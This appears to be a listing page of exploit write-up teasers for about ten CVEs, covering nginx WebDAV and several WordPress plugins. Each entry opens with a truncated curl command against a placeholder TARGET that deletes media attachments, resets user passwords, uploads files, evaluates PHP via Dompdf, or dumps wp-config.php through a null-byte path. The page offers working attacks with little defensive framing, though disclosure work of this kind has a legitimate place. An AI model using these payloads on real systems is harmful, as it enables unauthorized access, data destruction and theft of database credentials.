Articles

§06 · Field notes

CVE · PLUGINS · ZERO-DAYS
GitHub

CVE-2026-27654: nginx-dav-cve-2026-27654

## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...


CVE-2025-13419

## The Exploit Unauthenticated attackers can delete any media attachment by POSTing the attachment ID to the exposed REST endpoint. ```bash curl -i -X POST "https://target.example.com/wp-json/bfe/v1/revert" \ -H "Content-Type: text/plai...


CVE-2025-13722

## The Exploit Attacker needs any authenticated WordPress account with Subscriber-level access or higher. ```bash curl -i -X POST "https://TARGET/wp-admin/admin-ajax.php" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Co...


CVE-2025-14047

## The Exploit Unauthenticated attacker can delete arbitrary media attachments by POSTing `attachments_to_delete[]` directly to the plugin's AJAX submit endpoint. ```bash curl -s -X POST 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Co...


CVE-2025-14627

## The Exploit Authenticated Contributor-level attacker. ```bash curl -i -X POST 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-www-form-urlencoded' \ --data 'action=smack_upload&securekey=NONCE_VALUE&url=h...


CVE-2025-14998

## The Exploit Unauthenticated attackers can abuse the Branda login-screen signup-password flow to change a user password by POSTing `password_1` and an activation `key`. ```bash curl -i -s -X POST 'https://TARGET/wp-login.php?action=acti...


CVE-2025-14913

## The Exploit Unauthenticated attacker only needs `media_id` and the attachment upload timestamp to delete any attachment. ```bash TARGET=https://TARGET_HOST MEDIA_ID=123 MEDIA_KEY=$(python3 - <<'PY' import hashlib print(hashlib.md5(b"17...


CVE-2025-14635

## The Exploit Attacker needs authenticated Contributor-level access or above. ```bash curl -i -X POST "https://TARGET_HOST/wp-admin/admin-ajax.php?action=elementor_ajax_save" \ -H "Content-Type: application/x-www-form-urlencoded" \ -...


CVE-2025-14388

## The Exploit No authentication is required. ```bash curl -i 'http://TARGET/wp-content/plugins/phastpress/sdk/phast.php?url=/wp-config.php%2500.txt' ``` The vulnerable server returns HTTP 200 and dumps the contents of `wp-config.php` in...


CVE-2025-13773

## The Exploit An unauthenticated attacker can force the plugin to render attacker-supplied HTML through Dompdf with PHP evaluation enabled. ```bash curl -sS -X POST "http://TARGET/wp-admin/admin-ajax.php" \ -H "Content-Type: applicatio...
